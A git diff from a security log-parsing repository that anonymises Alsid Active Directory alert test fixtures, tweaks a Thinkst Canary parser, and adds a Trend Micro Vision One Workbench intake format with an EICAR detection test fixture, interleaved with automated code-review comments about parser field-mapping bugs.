@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp", + "ADobject": "CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "whenchanged", "alsidAttributeValue": "\"2020-01-09T09:24:41.0000000Z\"", - "eventID": "2434", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert2.json b/Tenable/alsid/tests/trailflow_alert2.json index a26f52b7b..38f57b925 100644 --- a/Tenable/alsid/tests/trailflow_alert2.json +++ b/Tenable/alsid/tests/trailflow_alert2.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "useraccountcontrol", "alsidAttributeValue": "\"DONT_EXPIRE NORMAL \"", - "eventID": "2432", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert3.json b/Tenable/alsid/tests/trailflow_alert3.json index 0d3b1d784..b073ae6e5 100644 --- a/Tenable/alsid/tests/trailflow_alert3.json +++ b/Tenable/alsid/tests/trailflow_alert3.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" 
\"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", "alertID": 8, "alsidAttributeName": "\"ntsecuritydescriptor\"", - "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", - "eventID": "7856795", + "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", + "eventID": "7856000", "eventType": "ACL change" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert4.json b/Tenable/alsid/tests/trailflow_alert4.json index 1d4ae660f..a2179f541 100644 --- a/Tenable/alsid/tests/trailflow_alert4.json +++ b/Tenable/alsid/tests/trailflow_alert4.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", "alertID": 8, "alsidAttributeName": "\"gptini-displayname\"", "alsidAttributeValue": "\"Nouvel objet Strat\u00e9gie de groupe\"", - "eventID": "7855399", + "eventID": "7855000", "eventType": "New object" }, "type": "trailflow" diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml 
@@ -21,6 +21,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{parsed_event.message.DN}}"
 output_field: result
 value_sep: "="
diff --git a/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
new file mode 100644
index 000000000..2f93f2919
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
@@ -0,0 +1,39 @@
+action.properties.ScriptBlockText:
+ description: ''
+ name: action.properties.ScriptBlockText
+ type: keyword
+
+trendmicro.vision_one.alert_id:
+ description: ''
+ name: trendmicro.vision_one.alert_id
+ type: keyword
+
+trendmicro.vision_one.case_id:
+ description: ''
+ name: trendmicro.vision_one.case_id
+ type: keyword
+
+trendmicro.vision_one.detection_name:
+ description: ''
+ name: trendmicro.vision_one.detection_name
+ type: keyword
+
+trendmicro.vision_one.incident_id:
+ description: ''
+ name: trendmicro.vision_one.incident_id
+ type: keyword
+
+trendmicro.vision_one.investigation_status:
+ description: ''
+ name: trendmicro.vision_one.investigation_status
+ type: keyword
+
+trendmicro.vision_one.severity:
+ description: ''
+ name: trendmicro.vision_one.severity
+ type: keyword
+
+trendmicro.vision_one.status:
+ description: ''
+ name: trendmicro.vision_one.status
+ type: keyword
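Review bot: The new `raise_errors: false` on the `kv.parse-kv` stage means a `DN` value that does not split into `key=value` pairs no longer fails the parser but leaves `result` unset, and nothing in the hunk says why that trade-off is wanted. A one-line comment above it, `# tolerate a DN that is not key=value; later stages must cope with a missing result`, would make the intent reviewable. The stages that read `result` are outside this hunk, so whether they presumably already guard against its absence is not verifiable here and is worth confirming.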
diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
new file mode 100644
index 000000000..e51bb3eb7
Binary files /dev/null and b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png differ
diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
new file mode 100644
index 000000000..014352012
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
@@ -0,0 +1,12 @@
+uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
+automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
+automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
+name: Trend Micro Vision One Workbench Alerts [BETA]
+slug: trend-micro-vision-one-workbench-alerts
+
+description: >-
+ Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation.
+ This intake format will ingest Workbench Alerts from Trend Micro Vision One.
+
+data_sources:
+ Process monitoring:
diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
new file mode 100644
index 000000000..742eee7cc
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
@@ -0,0 +1,10 @@
+[
+ {
+ "value": "{event.reason} on {host.ip}",
+ "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }]
+ },
+ {
+ "value": "{event.reason}",
+ "conditions": [{ "field": "event.reason" }]
+ }
+]
diff --git a/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
new file mode 100644
index 000000000..f5859582b
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml 
@@ -0,0 +1,102 @@
+name: trend-micro-vision-one-workbench
+ignored_values: []
+pipeline:
+ - name: parsed_event
+ external:
+ name: json.parse-json
+ properties:
+ input_field: "{{original.message}}"
+ output_field: message
+
+ - name: set_ecs_fields
+
+stages:
+ set_ecs_fields:
+ actions:
+ - set:
+ event.kind: alert
+ event.category: ["intrusion_detection"]
+ event.type: ["info"]
+ observer.vendor: "TrendMicro"
+ observer.product: "Vision One"
+
+ event.reason: "{{parsed_event.message.model}}"
+
+ - set:
+ "@timestamp": "{{parsed_event.message.createdDateTime}}"
+
+ host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}"
+ host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}"
+ host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}"
+
+ user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}"
+ container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}"
+ container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}"
+
+ rule.name: "{{parsed_event.message.model}}"
+ rule.id: "{{parsed_event.message.model.modelId}}"
+
+ event.url: "{{parsed_event.message.workbenchLink}}"
+ event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
+
+ - set:
+ user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
+
+ - set:
+ user.name: "{{final.user.id.split('\\\\') | last}}"
+ user.domain: "{{final.user.id.split('\\\\') | first}}"
+ filter: "{{final.user.id != null}}"
+
+ - set:
+ process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}"
+ process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}"
+ process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}"
+ process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}"
+ process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}"
+ process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}"
+
+ process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}"
+ process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}"
+
+ process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}"
+ process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}"
+
+ - set:
+ registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}"
+ registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
+ registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}"
+ registry.path: >
+ {%- set path = [] -%}
+ {%- for indicator in parsed_event.message.indicators -%}
+ {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %}
+ {%- endfor -%}
+ {%- for indicator in parsed_event.message.indicators -%}
+ {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %}
+ {%- endfor -%}
+ {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%}
+
+ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}"
+
+ - set:
+ registry.data.type: "REG_SZ"
+ filter: "{{final.registry.data.strings != null }}"
+
+ - set:
+ file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}"
+ file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}"
+ file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}"
+ file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}"
+
+ user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}"
+
+ - set:
+ action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}"
+
+ - set:
+ trendmicro.vision_one.severity: "{{parsed_event.message.severity}}"
+ trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}"
+ trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}"
+ trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}"
+ trendmicro.vision_one.status: "{{parsed_event.message.status}}"
+ trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}"
+ trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}"
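Review bot: `rule.id: "{{parsed_event.message.model.modelId}}"` looks for `modelId` under `model`, but `model` is the alert's display-name string (it is also what feeds `rule.name` and `event.reason`) while `modelId` is a sibling top-level key, so `rule.id` is never populated — the EICAR test below expects only `rule.name` even though its input carries `"modelId": "dee5c874-…"`. The line should read `rule.id: "{{parsed_event.message.modelId}}"`, with the test expectation updated to include the id. Separately, `user.domain: "{{final.user.id.split('\\\\') | first}}"` is guarded only by `final.user.id != null`, so an account value without a backslash would presumably put the same string into both `user.name` and `user.domain`; moving the domain into its own set with `filter: "{{final.user.id != null and '\\\\' in final.user.id}}"` avoids that. The later `user.name: … 'logonUser' …` set may also overwrite the name derived from `user.id` when both indicators are present, which depends on the engine's handling of empty values and is worth confirming.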
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..53813871b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json 
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": 
\"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, 
\"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": 
